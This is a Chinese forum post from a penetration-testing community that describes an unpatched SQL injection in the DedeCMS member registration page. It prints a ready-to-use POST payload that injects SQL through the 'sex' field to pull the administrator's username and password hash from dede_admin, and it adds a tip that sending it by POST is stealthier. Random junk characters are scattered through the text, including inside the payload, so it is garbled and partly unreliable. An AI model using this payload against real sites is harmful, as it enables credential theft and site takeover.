中国网络渗透测试联盟

标题: 织梦SQL注入漏洞再利用 [打印本页]

作者: admin    时间: 2013-1-19 08:25
标题: 织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞$ ~, S0 N3 j; k3 a; X
简要描述:
% ^8 b  ^1 p1 w0 | 2 G* p, d2 M9 z% c. X& w) f3 M0 [/ c
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.9 c/ d0 `0 i2 u+ A
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
0 L# `6 j) U- g$ V9 l0 K' ]* d' P详细说明:跟这个漏洞, K# `6 I) W) S' k& l+ Q' R

9 @0 Z6 ^* E1 Y0 N4 gWooYun: Dedecms SQL注射导致审核机制绕过漏洞6 b$ N, R7 r. |
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.1 F+ i8 N: j' z! Q
POST提交以下数据,其实不用POST提交的,这样隐蔽点.9 Z# G  i$ y2 f! {5 h
; _5 }; @8 V" @/ m3 N' m: C3 T% v: k
www.political-security.com/member/reg_new.php
6 c( }% p  U5 E. u . |" s) r7 g) ?2 x, G2 l/ m
POST2 f5 K0 y) V3 @3 n

+ ^, q7 I* i* ]dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&6 {2 K. d2 K! u) o5 K
userid=c4rp3nt3r&uname=c4rp3nt3r
8 x: L7 z' a! z- F9 \3 @! {. X&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss* K) o  Y/ N7 Y3 h- ~4 b. n
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,7 J% [. J. \5 {7 l+ W1 c: }
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');5 v$ A) H: Z: `8 e& i
%00&vdcode=glos&agree=




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2